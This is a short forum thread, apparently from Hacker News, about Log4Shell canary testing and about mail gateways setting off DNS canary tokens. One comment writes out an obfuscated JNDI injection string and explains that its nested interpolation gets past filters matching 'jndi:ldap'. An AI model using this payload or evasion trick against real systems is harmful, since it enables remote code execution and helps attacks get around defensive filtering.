4 ms·
Lots of mail gateways / mail security appliances do DNS lookups of URLs in the message body in order to check domain reputation and filter phishing links. It lo
by _null_ 5y ago
Lots of mail gateways / mail security appliances do DNS lookups of URLs in the message body in order to check domain reputation and filter phishing links. It looks like he's using a DNS canary token which would be triggered by those as well.
- moyix 5y agoYep, see later in the thread for how I'm avoiding that now; basically it uses a second level of interpolation so that it will only expand to the token when log4j is expanding it: ${jndi:ldap://${::-t}${::-o}${::-k}${::-e}${::-n}/a} I stole this trick from my Apache logs; people are using it to bypass dumb filters that just trigger on "jndi:ldap".
- camtarn 5y agoThe fact this apparently triggers an error in Reddit is freaking hilarious.
- lights0123 5y agoMany WAFs now block HTTP requests that will exploit it. Cloudflare (not what Reddit uses) does it for all customers automatically, for example.